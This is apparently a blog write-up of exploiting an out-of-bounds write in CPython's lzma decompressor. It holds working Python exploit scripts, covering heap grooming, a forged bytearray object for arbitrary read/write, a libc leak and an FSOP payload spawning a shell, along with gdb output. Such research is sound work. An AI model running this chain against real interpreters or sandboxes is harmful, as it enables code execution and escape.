  internal = 0x555555e53b50,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

Now, let’s continue on to the second decompress call.

We of course pass the lzs->next_in != NULL check. Since input_buffer and input_buffer_size in d are both 0, the calculated avail_now and avail_total both come out “negative”, and because they’re size_t that means they wrap around to enormous unsigned values. Neither avail_total < len nor avail_now < len holds, so we skip the PyMem_Realloc and memmove logic entirely. We now land on the memcpy as expected!

─────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
memcpy@plt (
   $rdi = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00,
   $rsi = 0x00007ffff77e8c40 → "AAAAAAAAAAAAAAAA",
   $rdx = 0x0000000000000010,
   $rcx = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00
)
────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+1025 ────
   1020	         else if (avail_now < len) {
   1021	             memmove(d->input_buffer, lzs->next_in,
   1022	                     lzs->avail_in);
   1023	             lzs->next_in = d->input_buffer;
   1024	         }
                 // data=0x00007fffffff9ea0  →  [...]  →  "AAAAAAAAAAAAAAAA", lzs=0x00007fffffff9ec0  →  [...]  →  0xff1422255f124a10
 → 1025	         memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
   1026	         lzs->avail_in += len;
   1027	         input_buffer_in_use = 1;
   1028	     }
   1029	     else {
   1030	         lzs->next_in = data;

We will be writing to 0x7ffff6cda0c0, which is the boundary of the original buffer (since we compute next_in + avail_in), a clear OOB write. If we manage to get some sort of useful struct adjacent to the original buffer, then we’re golden in upgrading this OOB write to an arbitrary R/W!
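The branch decisions and the destination address can be rechecked with a bit of arithmetic. This sketch plugs the values from the gdb dump into the same expressions as the C code, masking to 64 bits to imitate size_t wrap-around. The assumptions: a 64-bit size_t, and input_buffer / input_buffer_size both being 0 because the allocation never succeeded.

```python
MASK = (1 << 64) - 1  # size_t is 64 bits wide on x86-64

# Values read off the lzma_stream dump after the failed first call
next_in = 0x7FFFF6BDA06C
avail_in = 0x100054
input_buffer = 0        # never allocated, so NULL
input_buffer_size = 0
length = 16             # len(b'A' * 16)

# Same expressions as in decompress(), wrapped like unsigned C arithmetic
avail_now = ((input_buffer + input_buffer_size) - (next_in + avail_in)) & MASK
avail_total = (input_buffer_size - avail_in) & MASK

takes_realloc = avail_total < length
takes_memmove = (not takes_realloc) and avail_now < length
dest = next_in + avail_in  # where memcpy will write

print(hex(avail_now), hex(avail_total), takes_realloc, takes_memmove, hex(dest))
```

Both guards evaluate to False, and dest comes out as 0x7ffff6cda0c0, matching $rdi in the memcpy call.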

Note: as I’m writing this post, for some reason this buffer is sitting in the pyheap (0x7ffff7600000 range) rather than the regular glibc heap (0x555555e51000 range). This pisses me off because the fact that a large buffer should be landing in the glibc heap instead is part of why the next few sections are so messy. Regardless, we cringe on.

Going Places

Yellow Swans are an interesting noise/ambient/drone/tape music project. Something I’m a big fan of is all of their alt names (the same way SPK or Foetus has hella alt names), all being some variation on D.* Yellow Swans: Drowner Yellow Swans, Dove Yellow Swans, Doorendoorslechte Yellow Swans. “Going Places” is easily their most popular work, and for good reason. Ethereal yet damning ambient soundscapes that swallow you whole.

Anyways, let’s try to upgrade our primitive.

Finer Memory Control

Right now, our memory exhaustion is being triggered by, well, dumb luck. We have just enough memory that we only have a failed malloc at the specific block we want, and this quickly becomes extremely unreliable once you so much as sneeze on the code. Furthermore, we want to at least try to get our buffer to land in the pyheap rather than the glibc heap so that we have more structs to play with.

We start by shrinking down our LZMA compressed payload to a healthier 2kB. If we’re good, we can make this work. Since we also want adjacent structs, we should try something sort of but not exactly (but maybe it actually is?) heap spraying: after shrinking our memory space, we spam objects until we hit our memory limit, then we pop a few, which ideally should be adjacent.

import resource
import lzma

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        # sprayyyy
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
# these should be side by side?
fillers.pop()
fillers.pop()

c = bytearray(
    b'\xfd7zXZ\x00...' # shrunk down to 2kB
    )
d = bytearray(len(c))

We’re hitting another snag though. Remember the lzma_code calls in decompress_buf? That allocates a bunch of crap too, so now we keep hitting a premature MemoryError after a few iterations of it before we can even make it to our error block. After a bit of tinkering, however, an obvious solution came to me.

...
    if (lzret == LZMA_STREAM_END) {
        FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
        break;
    } else if (lzs->avail_out == 0) {
        /* Need to check lzs->avail_out before lzs->avail_in.
            Maybe lzs's internal state still have a few bytes
            can be output, grow the output buffer and continue
            if max_lengh < 0. */
        if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
            break;
        }
        if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
            goto error;
        }
...

If lzs->avail_out is 0x0 and the amount of output produced so far already equals max_length, we break out of decompress_buf after just one lzma_code call. For some reason, we can call decompress with a max_length of… zero, which makes both conditions true right away. So that means we can get decompress_buf to exit early, reliably, making our memory conditions easier to hit. Wonderful! Our script now looks something like this:

import resource
import lzma
import ctypes

def heap_addr(b: bytearray) -> int:
    buf = (ctypes.c_char * len(b)).from_buffer(b)
    return ctypes.addressof(buf)

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()

c = bytearray(
    b'\xfd7zXZ\x00...' # shrunk down to 2kB
    )
d = bytearray(len(c))

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
decompressor = lzma.LZMADecompressor()

try:
    print(f"Original data at {hex(id(c))}, {hex(heap_addr(c))}")
    print(f"Next thing at {hex(id(d))}, {hex(heap_addr(d))}")
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
a = decompressor.decompress(b'\x00' + b'\xfd'*16, 1)
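The `decompress(c, 0)` call in the script above leans on the early exit from decompress_buf. To see that behaviour on its own, away from the memory-limit noise, here is a minimal sketch assuming a stock lzma module; the `original` payload is filler made up for illustration and has nothing to do with the exploit buffer. Asking for zero bytes of output returns an empty result while the decompressor keeps the unconsumed input, and an empty follow-up call picks up from there.

```python
import lzma

# Hypothetical filler data, only here to have something to compress.
original = b"doomscrolling " * 64
compressed = lzma.compress(original)

decompressor = lzma.LZMADecompressor()

# max_length=0: "give me at most zero bytes of output".
# The call returns right away with nothing decompressed.
first = decompressor.decompress(compressed, max_length=0)
needs_input_after_first = decompressor.needs_input
eof_after_first = decompressor.eof
print(first, needs_input_after_first, eof_after_first)

# The leftover input is still buffered inside the decompressor, so an
# empty bytes object is enough to let it run to the end of the stream.
rest = decompressor.decompress(b"")
print(rest == original, decompressor.eof)
```

The lzma documentation describes the same thing from the user's side: when max_length cuts the output short, needs_input is set to False and the next call may pass b'' to get more output.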

The ctypes crap in the script is me cheating a little bit for debugging purposes. Creating a bytearray creates a PyByteArrayObject that sits in the pyheap, whereas the actual memory which contains the data (and more importantly, where the OOB write would occur) lives in the glibc heap and is only referenced by a pointer field in that struct. So when calling id, you get the object’s address (the actually mutable crap), while the byte data sits elsewhere (somehow, this is relevant later).
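The object-versus-data split is easy to poke at in isolation. This is a small sketch, assuming CPython (where id returns the object's address); `data_addr` is a hypothetical helper name that does the same thing as heap_addr in the script, and the "LZMA" marker bytes are made up for illustration.

```python
import ctypes

def data_addr(b: bytearray) -> int:
    """Address of the bytes a bytearray currently holds (CPython only)."""
    # The temporary ctypes view is released when this function returns,
    # so the bytearray can still be resized afterwards.
    view = (ctypes.c_char * len(b)).from_buffer(b)
    return ctypes.addressof(view)

buf = bytearray(b"LZMA" + bytes(2044))
object_addr = id(buf)          # where the PyByteArrayObject header lives
payload_addr = data_addr(buf)  # where the 2kB of data lives
print(hex(object_addr), hex(payload_addr))

# Reading raw memory at payload_addr gives back the bytearray contents.
peek = ctypes.string_at(payload_addr, 4)
print(peek)

# Growing the bytearray may move the data, but never the object itself.
buf.extend(bytes(1 << 16))
print(id(buf) == object_addr, hex(data_addr(buf)))
```

Whether the data pointer actually changes after the extend depends on what the allocator decides to do, so the sketch prints it rather than promising anything.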

Running this script (test4.py), we now see that we can get buffers that are kissing (the gap between the two data addresses is 0x920 bytes, i.e. the roughly 2kB buffer plus allocator and debug-hook overhead):

gef➤  r ../../test4.py
Starting program: ~/cpython/build-debug/python ../../test4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Allocated 5310 fillers of size 2.0kB each
Original data at 0x7ffff76ccbe0, 0x555556ab9910
Next thing at 0x7ffff76ccc40, 0x555556aba230
Decompressor is at 0x7ffff77c8f40
...
gef➤  x/20gx 0x555556aba230-0x80
0x555556aba1b0:	0x0008808011910100	0xfb67c4b18c5a88ba
0x555556aba1c0:	0x5a59040000000002	0xfdfdfdfdfdfdfd00
0x555556aba1d0:	0xfdfdfdfdfdfdfdfd	0xddddddddddddddfd
0x555556aba1e0:	0xdddddddddddddddd	0x0000000000000921
0x555556aba1f0:	0xf108000000000000	0xfdfdfdfdfdfdfd72
0x555556aba200:	0xd908000000000000	0xfdfdfdfdfdfdfd6f
0x555556aba210:	0x0000000000000001	0x0000555555d3f060
0x555556aba220:	0x00000000000008b8	0xffffffffffffffff
0x555556aba230:	0x0000000000000000	0x0000000000000000
0x555556aba240:	0x0000000000000000	0x0000000000000000

Ok, two things:

The Punishment for Using a Debug Build

Remember I said using a debug build is blasphemous? Here’s a quick excerpt from the Python documentation:

When Python is built in debug mode, the PyMem_SetupDebugHooks() function is called at the Python preinitialization to setup debug hooks on Python memory allocators to detect memory errors.

The PYTHONMALLOC environment variable can be used to install debug hooks on a Python compiled in release mode (ex: PYTHONMALLOC=debug).

The PyMem_SetupDebugHooks() function can be used to set debug hooks after calling PyMem_SetAllocator().

These debug hooks fill dynamically allocated memory blocks with special, recognizable bit patterns. Newly allocated memory is filled with the byte 0xCD (PYMEM_CLEANBYTE), freed memory is filled with the byte 0xDD (PYMEM_DEADBYTE). Memory blocks are surrounded by “forbidden bytes” filled with the byte 0xFD (PYMEM_FORBIDDENBYTE). Strings of these bytes are unlikely to be valid addresses, floats, or ASCII strings.

The purpose of this padding is so that developers can more easily catch these OOB bugs: the debug hooks check the forbidden bytes when a block is freed or reallocated, and abort with a fatal error if they have been overwritten. This is actually incredibly useful and an amazing feature.
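Those fill patterns are what the gdb dump earlier is full of. As a rough sketch (the `annotate` helper and its one-letter markers are made up for this post, not anything from CPython), here is a way to label each byte of a dumped qword, fed with a few values copied from that dump:

```python
import struct

PYMEM_CLEANBYTE = 0xCD      # freshly allocated, not yet written
PYMEM_DEADBYTE = 0xDD       # freed memory
PYMEM_FORBIDDENBYTE = 0xFD  # guard bytes around each block

# Hypothetical one-letter labels for readability.
MARKERS = {
    PYMEM_CLEANBYTE: "C",
    PYMEM_DEADBYTE: "D",
    PYMEM_FORBIDDENBYTE: "F",
}

def annotate(qword: int) -> str:
    """Label the 8 bytes of a little-endian qword, lowest address first."""
    raw = struct.pack("<Q", qword)
    return "".join(MARKERS.get(byte, ".") for byte in raw)

# Values taken from the x/20gx output above.
for qword in (0xfdfdfdfdfdfdfd00, 0xddddddddddddddfd,
              0xdddddddddddddddd, 0x0000000000000921):
    print(f"{qword:#018x}  {annotate(qword)}")
```

Read this way, the run of F bytes followed by D bytes looks like the guard region after a block running into already-freed memory, which is my reading of the dump rather than something the docs spell out.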

However, this also means that writing my exploit becomes slightly more annoying and whatever I write for this debug build will not work on a release build. Dammit! Let’s shift over to a release build and wrap up our exploit.

Actually Getting Arb R/W

Okay okay so. Let’s think about what a useful struct to overflow into would be. We want some pointers that we can overwrite…

When allocating a large list, the backing array (i.e. the actual region of memory which contains the pointers to the objects in the list) is thrown into the glibc heap, so if we can get that to kiss our bad buffer, then we might be able to make a list element point to a fake PyObject:

import resource
import lzma
import struct

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) 
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()

payload = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZd'
    + b'A'*(2048-32+10)
)

c = bytearray(
        payload
    )
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')

x = bytearray(2048-10) 
e = b'A'*(2048-10) # once again, some fuckery to hit OOM

Notice how it took me this long to realise I could just scam my way with an LZMA header and a bunch of 0x41s since we’re prematurely axing the decompression. Well, this arrangement is just nice to get the backing array of d to be adjacent to the backing memory of c.

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Allocated 6165 fillers of size 2.0kB each
Original data at 0x7ffff75b67f0
Next thing at 0x7ffff779f500
Decompressor is at 0x7ffff773c1f0
...
────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  x/8gx 0x7ffff75b67f0 <-- this is the PyByteArrayObject of c
0x7ffff75b67f0:	0x0000000000000001	0x0000555555c35fa0
0x7ffff75b6800:	0x000000000000080b	0x000000000000080b
0x7ffff75b6810:	0x0000555556b023b0	0x0000555556b023b0 <-- this is the backing array address
0x7ffff75b6820:	0x0000000000000000	0x0000555556b02390
gef➤  x/20gx 0x0000555556b023b0
0x555556b023b0:	0x0400005a587a37fd	0x0000000046b4d6e6 <-- our LZMA data is here 
0x555556b023c0:	0x7df3b61f2144df1c	0x5a59040000000001
0x555556b023d0:	0x4141414141414164	0x4141414141414141
0x555556b023e0:	0x4141414141414141	0x4141414141414141
0x555556b023f0:	0x4141414141414141	0x4141414141414141
0x555556b02400:	0x4141414141414141	0x4141414141414141
0x555556b02410:	0x4141414141414141	0x4141414141414141
0x555556b02420:	0x4141414141414141	0x4141414141414141
0x555556b02430:	0x4141414141414141	0x4141414141414141
0x555556b02440:	0x4141414141414141	0x4141414141414141
gef➤  x/8gx 0x7ffff779f500 <-- this is the list object (PyListObject) of d
0x7ffff779f500:	0x0000000000000001	0x0000555555c47900
0x7ffff779f510:	0x0000000000000105	0x0000555556b02bd0 <-- this is the backing array address
0x7ffff779f520:	0x0000000000000105	0x00000000006e6f6d
0x7ffff779f530:	0x00007ffff779f431	0x00007ffff779f770
gef➤  x/20gx 0x0000555556b02bd0-0x40 <-- peeking a bit behind, we see they kiss <3
0x555556b02b90:	0x4141414141414141	0x4141414141414141
0x555556b02ba0:	0x4141414141414141	0x4141414141414141
0x555556b02bb0:	0x4141414141414141	0x0000000000414141
0x555556b02bc0:	0x0000000000000000	0x0000000000000831
0x555556b02bd0:	0x0000555555c7e860	0x0000555555c7e880
0x555556b02be0:	0x0000555555c7e8a0	0x0000555555c7e8c0
0x555556b02bf0:	0x0000555555c7e8e0	0x0000555555c7e900
0x555556b02c00:	0x0000555555c7e920	0x0000555555c7e940
0x555556b02c10:	0x0000555555c7e960	0x0000555555c7e980
0x555556b02c20:	0x0000555555c7e9a0	0x0000555555c7e9c0
gef➤  
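The 0x831 sitting right before the backing array of d is the glibc chunk size field, and it can be reproduced by hand. A minimal sketch, assuming 64-bit glibc malloc (8-byte size field, 16-byte alignment) and that the list allocates exactly its 261 slots, which is what the 0x105 in the dump suggests; `chunk_size` is a hypothetical helper, not a glibc API.

```python
SIZE_SZ = 8                      # sizeof(size_t) on x86-64
MALLOC_ALIGNMENT = 2 * SIZE_SZ   # chunks are 16-byte aligned
MINSIZE = 4 * SIZE_SZ            # smallest chunk glibc hands out
PREV_INUSE = 0x1                 # low bit of the size field

def chunk_size(request: int) -> int:
    """Chunk size glibc would use for a malloc(request), without flag bits."""
    padded = (request + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(padded, MINSIZE)

list_slots = 256 + 5                  # same length as d in the script
backing_bytes = list_slots * 8        # one 8-byte pointer per slot
size_field = chunk_size(backing_bytes) | PREV_INUSE

print(hex(backing_bytes), hex(size_field))
```

That matches the value in the dump, which is why any overflow that crosses this header has to write the same 0x831 back.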

Now, we can overwrite from the end of our fake LZMA buffer into the backing array! We just need to make it point to a fake PyObject struct, and of course the most useful would be… a PyByteArrayObject! If we fake a struct that just starts at, like, 0x0 or something and has an obscene size, we basically get arbitrary R/W across the entire memory space.
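For reference, this is roughly what a PyByteArrayObject header looks like field by field. It is a sketch under assumptions: the field names follow CPython's bytearray struct as I understand it for a 64-bit, non-free-threaded build, newer versions may append more fields after ob_exports, and `FakeByteArrayHeader` is a made-up name used only to compute offsets with ctypes.

```python
import ctypes

class FakeByteArrayHeader(ctypes.Structure):
    """Hypothetical mirror of the bytearray header, for offset math only."""
    _fields_ = [
        ("ob_refcnt", ctypes.c_ssize_t),   # must be non-zero
        ("ob_type", ctypes.c_void_p),      # pointer to the type object
        ("ob_size", ctypes.c_ssize_t),     # logical length
        ("ob_alloc", ctypes.c_ssize_t),    # allocated length
        ("ob_bytes", ctypes.c_void_p),     # start of the allocation
        ("ob_start", ctypes.c_void_p),     # start of the visible data
        ("ob_exports", ctypes.c_ssize_t),  # active buffer exports
    ]

# Print each field with its offset from the start of the object.
for name, _ctype in FakeByteArrayHeader._fields_:
    offset = getattr(FakeByteArrayHeader, name).offset
    print(f"{offset:#04x}  {name}")

print("header size:", ctypes.sizeof(FakeByteArrayHeader))
```

With ob_bytes and ob_start pointing at a low address and ob_size set to something obscene, indexing into the object is just address arithmetic relative to ob_start.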

Where can we put our fake struct? For some reason, when doing up the exploit for the first time, I thought it would be really smart to put it in the fake LZMA buffer, then using a separate heap leak I’d calculate the offset to it. This was extremely painful, thoughtless, and stupidly unreliable (even a single addition to the script would completely change the offset!). A quick set of texts with Lucas “samuzora” Tan showed me the error of my ways, thankfully (why even calculate an offset when you can just… use the payload position directly?).

So let’s get the following:

Our script now looks like this:

import resource
import lzma
import struct

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024)
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()
fillers.pop()

faker = (
    b'd\x00\x00\x00\x00\x00\x00\x00'     # ob_refcnt (non-zero)
    + struct.pack("<q", id(bytearray))     # ob_type
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_size
    + b'\xff\xff\xff\xff\xff\xff\xff\x7f'  # ob_alloc
    + struct.pack("<q", id(int)-0x6f4680)  # ob_bytes (buffer pointer, we do PIE base)
    + struct.pack("<q", id(int)-0x6f4680)  # ob_start (just keep it the same)
    + b'\x00\x00\x00\x00\x00\x00\x00\x00'  # ob_exports
    + b'A'*2048 # padding to fall into glibc heap
)

lzma_buffer = (
    b'\xfd7zXZ\x00\x00\x04\xe6\xd6\xb4F\x00\x00\x00\x00\x1c\xdfD!\x1f\xb6\xf3}\x01\x00\x00\x00\x00\x04YZ'
    + b'A'*(2048-32+10)
)

c = bytearray(
        lzma_buffer
    )
# we want to overwrite some list pointer
d = [0] * (256+5)
for i in range(256+5):
    d[i] = i

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')

x = bytearray(2048-10) 
e = b'A'*(2048-10) # once again, some fuckery to hit OOM

decompressor = lzma.LZMADecompressor()

try:
    print(f"Original data at {hex(id(c))}")
    print(f"Next thing at {hex(id(d))}")
    print(f'Fake struct at {hex(id(faker))}')
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 0) # this is to break lzma decompress_buf at lzs->avail_out == 0
except MemoryError:
    pass
finally:
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
# this is our OOB write!
a = decompressor.decompress(
    b'\x00'*6 # padding between our kissing objects
    + struct.pack("<q", 0x0)
    + struct.pack("<q", 0x831) # do not fuck the glibc header
    + struct.pack("<q", id(faker)+0x20), # address of our fake struct, +0x20 to account for the header
    1,
)

input(f"OOB Write done!, array will start at {hex(id(int)-0x6f4680)}")

print(d[0][:256])

If you’re wondering what’s up with the x and e arrays and why we’re putting the lzma_buffer in a bytearray before calling decompress on it… uh… I couldn’t tell you. That’s just bad code and bad experimentation. This script can definitely be cleaner. Running this, we see that all of that actually worked!

➜  build-release git:(480edc1aae0) ✗ ./python ../../test4_1.py
Allocated 6172 fillers of size 2.0kB each
Original data at 0x7f797ee6ab30
Next thing at 0x7f797f06b380
Fake struct at 0x55ded7e3d6a0
Decompressor is at 0x7f797eff81f0
MemError triggered, decompressing again
OOB Write done!, array will start at 0x55de9a8b6000
bytearray(b'\x7fELF\x02\x01\x01...')

Wonderful. We now have arbitrary read and write and can do whatever we want. Like a crappy FSOP payload with hardcoded offsets.

# gonna need to make it to GOT with this one
leak = (d[0][0x6e0038:0x6e0038+8])

libc_base = int.from_bytes(leak,'little')-0x89ae0
print('libc base: ', hex(libc_base))
print('stderr: ', hex(libc_base+0x1e84a0))

elf_base = id(int)-0x6f4680
stderr = libc_base+0x1e84a0
wfile_jumps = libc_base+0x1e6228
system = libc_base+0x53b00

p64 = lambda x: struct.pack('<Q', x)
input("pause...")

fsop = b''.join([
    b"  sh\x00\x00\x00\x00",            # 0x00: flags
    p64(0),                             # 0x08: _IO_read_ptr
    p64(0),                             # 0x10: _IO_read_end
    p64(0),                             # 0x18: _IO_read_base
    p64(0),                             # 0x20: _IO_write_base
    p64(1),                             # 0x28: _IO_write_ptr
    p64(0) * 7,                         # 0x30 - 0x60: write_end, buf_base... to markers
    p64(system),                   # 0x68: chain
    p64(0) * 3,                         # 0x70 - 0x80: fileno, old_offset, cur_column
    p64(stderr + 0x210),            # 0x88: _lock (needs to point to writable nulls)
    p64(0),                             # 0x90: _offset
    p64(stderr),                   # 0x98: _codecvt
    p64(stderr - 0x48),            # 0xa0: _wide_data
    p64(0) * 6,                         # 0xa8 - 0xd0: freeres, pad, mode, unused
    p64(wfile_jumps)               # 0xd8: vtable
])

print(d[0][stderr-elf_base:stderr-elf_base+64])
d[0][stderr-elf_base:stderr-elf_base+len(fsop)] = fsop

And we get a shell :)

Fig: Winner winner chicken dinner

Conclusion

Was this a difficult bug to exploit? Eh… the hard part was honestly finagling the memory to behave how we want since the OOB write primitive itself is quite obvious to get to. Once you get the OOB write, then it’s just a matter of knowing what to do with it since you’re sitting in the sad glibc heap rather than the cool epic pyheap (I wasted a lot of time trying to figure out how to land the LZMA buffer in the pyheap with the memory exhaustion criteria).

So what did I learn from this?

Hopefully, you at least found this entertaining. Okay, ciao.